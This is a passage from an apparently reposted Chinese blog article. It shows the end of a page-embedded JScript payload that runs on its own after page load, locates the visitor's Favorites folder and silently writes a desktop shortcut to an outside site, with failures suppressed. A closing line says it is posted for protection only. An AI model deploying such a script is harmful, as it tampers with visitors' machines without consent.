    // Looks for a Favorites folder, first under the folder returned by GetSpecialFolder(0) and
    // then under "Documents and Settings\<user>"; f() returns early when neither exists.
    WF = FSO.GetSpecialFolder(0);
    loc = WF + "\\Favorites";
    if(!FSO.FolderExists(loc)) {
    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
    if(!FSO.FolderExists(loc)) {
    return;
    }
    }
    // The computed loc is not used: the shortcut goes to a hard-coded desktop path.
    AddFavLnk("C:\\WINDOWS\\Desktop", "中国民间黑客网络", "http://i50.126.com/");
    //}
    }
    // Both catch blocks are empty, so any failure is hidden from the visitor.
    catch(e){ }
    }
    catch(e){ }
    }
    function init(){
    // String form of setTimeout: "f()" is evaluated one second after init() runs.
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>
    上面只是让你防护,千万不要害人。
  • 原文地址:https://www.cnblogs.com/zhangronghua/p/823765.html